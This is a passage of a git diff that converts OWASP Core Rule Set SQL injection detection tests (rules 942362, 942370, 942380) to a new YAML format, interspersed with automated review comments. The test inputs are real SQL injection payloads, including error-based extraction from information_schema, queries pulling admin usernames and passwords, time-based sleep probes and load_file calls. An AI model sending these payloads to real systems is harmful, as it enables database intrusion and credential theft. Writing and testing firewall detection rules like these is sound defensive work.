text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "SELECT load_file(" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 28 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "6 As\" from" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-29 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "6 As\" from" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 29 desc: "Detects concatenated basic SQL injection and SQLLFI attempts" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: ") as day1 FROM" - version: HTTP/1.0 - output: - log_contains: id "942362" - - test_title: 942362-30 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: ") as day1 FROM" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] + - test_id: 30 desc: GH issue 1580 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: ", aside from" - version: HTTP/1.0 - output: - no_log_contains: id "942362" - - test_title: 942362-31 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: ", aside from" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942362] + - test_id: 31 desc: GH issue 1605 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "a=/create" - version: HTTP/1.0 - output: - no_log_contains: id "942362" - - test_title: 942362-32 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/post" + data: "a=/create" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942362] + - test_id: 32 desc: GH issue 1605 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Host: localhost - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/post" - data: "a=/CREATE TABLE Persons" - version: HTTP/1.0 - output: - log_contains: id "942362" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Host: localhost + User-Agent: "OWASP CRS test 
agent" + method: POST + port: 80 + uri: "/post" + data: "a=/CREATE TABLE Persons" + version: HTTP/1.0 + output: + log: + expect_ids: [942362] diff --git a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942370.yaml b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942370.yaml index a071e20..18ba3f0 100644 --- a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942370.yaml +++ b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942370.yaml @@ -7,10 +7,9 @@ meta: WARNING: these tests were derived from the existing expressions and are semantically meaningless. The tests were used to ensure that a change to the assembly file would not change the semantics. If you know what a particular expression is supposed to catch, please revise the associated test. - enabled: true - name: 942370.yaml +rule_id: 942370 tests: - - test_title: 942370-1 + - test_id: 1 desc: | [\"'`]\s*?\*.+or\W*?[\"'`]\d [\"'`]\s*?\*.+xor\W*?[\"'`]\d 
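Review bot: Tests 18 and 23 carry the identical payload `data: ") AS schlagwoerter FROM"`, so the second adds no coverage and should be dropped or given a distinct payload. The comment on test 1, `# 23423 as "sdfsdfs" FROM table`, does not match the payload it annotates — the URL-decoded `data` reads `var=1234 AS "foobar" FROM tablevar2=whatever` — so it should become `# var=1234 AS "foobar" FROM tablevar2=whatever`; the missing `&` before `var2` presumably is an old typo (`table&var2=whatever` looks intended), though the positive expectation holds either way and fixing it is separate from this migration. The `Accept` header is quoted only in tests 30–32 and plain elsewhere in this file; one form throughout would be cleaner.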
@@ -19,93 +18,93 @@ tests: [\"'`]\s*?\*.+between\W*?[\"'`]\d [\"'`]\s*?\*.+and\W*?[\"'`]\d stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=' * from = 1 or '9" - version: HTTP/1.0 - output: - log_contains: id "942370" - - test_title: 942370-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=' * from = 1 or '9" + version: HTTP/1.0 + output: + log: + expect_ids: [942370] + - test_id: 2 desc: | [\"'`]\s*?\*.+id\W*?[\"'`]\d stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=' * from = 1 id '9" - version: HTTP/1.0 - output: - log_contains: id "942370" - - test_title: 942370-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=' * from = 1 id '9" + version: HTTP/1.0 + output: + log: + expect_ids: [942370] + - test_id: 3 desc: | [^\w\s?]+\s*?[^\w\s]+\s*?[\"'`"] stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=' = # '" - version: HTTP/1.0 - output: - log_contains: id 
"942370" - - test_title: 942370-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=' = # '" + version: HTTP/1.0 + output: + log: + expect_ids: [942370] + - test_id: 4 desc: | [^\w\s]+\s*?[\W\d].*?# stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=' ? # = #" - version: HTTP/1.0 - output: - log_contains: id "942370" - - test_title: 942370-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=' ? # = #" + version: HTTP/1.0 + output: + log: + expect_ids: [942370] + - test_id: 5 desc: | [^\w\s]+\s*?[\W\d].*?-- stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var='? # = --" - version: HTTP/1.0 - output: - log_contains: id "942370" - - test_title: 942370-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var='? # = --" + version: HTTP/1.0 + output: + log: + expect_ids: [942370] + - test_id: 6 desc: | [\"'`]\s*?or\s[^\d]+[\w-]+.*?\d [\"'`]\s*?xor\s[^\d]+[\w-]+.*?\d 
@@ -114,102 +113,102 @@ tests: [\"'`]\s*?between\s[^\d]+[\w-]+.*?\d [\"'`]\s*?and\s[^\d]+[\w-]+.*?\d stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=' or homer 9" - version: HTTP/1.0 - output: - log_contains: id "942370" - - test_title: 942370-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=' or homer 9" + version: HTTP/1.0 + output: + log: + expect_ids: [942370] + - test_id: 7 desc: | \^[\"'`] stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=^'" - version: HTTP/1.0 - output: - log_contains: id "942370" - - test_title: 942370-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=^'" + version: HTTP/1.0 + output: + log: + expect_ids: [942370] + - test_id: 8 desc: | [\"'`].*?\*\s*?\d stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=\"` * 12344" - version: HTTP/1.0 - output: - log_contains: id "942370" - - test_title: 942370-9 + - input: + dest_addr: 127.0.0.1 + 
headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=\"` * 12344" + version: HTTP/1.0 + output: + log: + expect_ids: [942370] + - test_id: 9 desc: | [()\*<>%+-][\w-]+[^\w\s]+[\"'`][^,] stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=>foo##'." - version: HTTP/1.0 - output: - log_contains: id "942370" - - test_title: 942370-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=>foo##'." 
+ version: HTTP/1.0 + output: + log: + expect_ids: [942370] + - test_id: 10 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: 1"and json_search (json_array(password),0b11000010110110001101100,"t_______________")# - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "942370" - - test_title: 942370-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: 1"and json_search (json_array(password),0b11000010110110001101100,"t_______________")# + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log: + expect_ids: [942370] + - test_id: 11 desc: encode(lo_get(16400),'base64')::int stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: encode(lo_get(16400),'base64')::int - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "942370" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: encode(lo_get(16400),'base64')::int + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log: + expect_ids: [942370] diff --git a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942380.yaml b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942380.yaml index d229d33..c3445da 100644 --- a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942380.yaml +++ b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942380.yaml 
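Review bot: The entry `- test_id: 10` in this hunk is the only test in 942370.yaml carried over without a `desc` field, while every sibling (1–9, 11) keeps one; the migration from `test_title` to `test_id` drops the old "942370-10" label, so the test now has no human-readable purpose at all. Suggest adding `desc: "json_search/json_array call with binary literal in User-Agent"` directly under `- test_id: 10`, matching the style of test 11, which is otherwise the only other non-regex description in the file. The same `test_id` without `desc` pattern does not recur in the other 942370 hunks, so this is the only place to fix it.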
@@ -1,772 +1,770 @@ --- meta: author: "Christoph Hansen, azurit" - description: None - enabled: true - name: 942380.yaml +rule_id: 942380 tests: - - test_title: 942380-1 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "from `db_miwf`.`sys_refindex` limit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-2 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "from(select count(*),concat((select (select (select concat(0x53,0x65,0x61,0x72,0x63,0x68,0x43,0x6F,0x6C,0x6C,0x65,0x63,0x74,0x6F,0x72) from `information_schema`.tables limit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-3 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "from `information_schema`.tables limit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-4 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "ORder by" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 
942380-5 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "ordeR by" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-6 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SELECT (CASE" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-7 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=FROM+termine+GROUP+BY+tag1%26sql_delimit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-8 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SELECT 6229 FROM(SELECT COUNT(*),CONCAT(0x717a786a71,(SELECT (CASE" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-9 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - 
port: 80 - uri: "/post" - data: "SELECT CHAR(113)+CHAR(122)+CHAR(120)+CHAR(106)+CHAR(113)+(SELECT (CASE" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-10 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(122)||CHR(120)||CHR(106)||CHR(113)||(SELECT (CASE" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-11 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SELECT CONCAT(0x717a786a71,(SELECT (CASE" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-12 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SELECT (CHR(113)||CHR(122)||CHR(120)||CHR(106)||CHR(113))||(SELECT (CASE" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-13 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SELECT CHR(113)||CHR(122)||CHR(120)||CHR(106)||CHR(113)||(SELECT (CASE" - version: HTTP/1.0 - 
output: - log_contains: id "942380" - - test_title: 942380-14 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "SELECT 'qzxjq'||(SELECT (CASE" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-15 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "execute php" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-16 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user desc limit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-17 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "Execute(" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-18 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "from+information_schema.tables+where+BINARY+LEFT%28table_name%2C+1%29+%3D+%27nnn%27+LIMIT" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-19 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "from+information_schema.tables+where+table_schema%3Ddatabase%28%29+and+table_name+REGEXP+0x6d656d6265727324+limit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-20 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "fromtype%3DvBForum%3ASocialGroupMessage%26do%3Dprocess%26contenttypeid%3D5%26categoryid%5B%5D%3D-99%29+union+select+salt+from+user+where+userid%3D1+and+row%281%2C1%29%3E%28select+count%28%2A%29%2Cconcat%28+%28select+user.salt%29+%2C0x3a%2Cfloor%28rand%280%29%2A2%29%29+x+from+%28select+1+union+select+2+union+select+3%29a+group+by+x+limit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-21 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: 
"from%2F%2A%2A%2F%28select%2F%2A%2A%2Fcount%28%2A%29%2Cconcat%28floor%28rand%280%29%2A2%29%2C0x3a%2C%28select%2F%2A%2A%2Fconcat%28user%2C0x3a%2Cpassword%29%2F%2A%2A%2Ffrom%2F%2A%2A%2Fpwn_base_admin%2F%2A%2A%2Flimit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-22 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "HAVING+1%3D" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-23 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "execute+elysi" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-24 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "FROM%28SELECT+COUNT%28%2A%29%2CCONCAT%280x716a766b71%2C%28SELECT+%28ELT%283419%3D3419%2C1%29%29%29%2C0x7171717071%2CFLOOR%28RAND%280%29%2A2%29%29x+FROM+INFORMATION_SCHEMA.PLUGINS+GROUP+BY+x%29a%29%26limit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-25 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 
80 - uri: "/post" - data: "FROM%28SELECT+COUNT%28%2A%29%2CCONCAT%280x716a766b71%2C%28SELECT+%28ELT%289184%3D9184%2C1%29%29%29%2C0x7171717071%2CFLOOR%28RAND%280%29%2A2%29%29x+FROM+INFORMATION_SCHEMA.PLUGINS+GROUP+BY+x%29a%29+AND+%27%25%27%3D%27%26limit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-26 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "from%28select%28sleep%2820%29%29%29a%29%27%26data%5BJob%5D%5Blimit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-27 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "from%28select%28sleep%2820%29%29%29a%29%2B%27%26data%5BJob%5D%5Blimit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-28 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "from%28select%28sleep%2820%29%29%29a%29--+%26data%5BJob%5D%5Blimit" - version: HTTP/1.0 - output: - log_contains: id "942380" - - test_title: 942380-29 - desc: "SQL Injection Attack" - stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: 
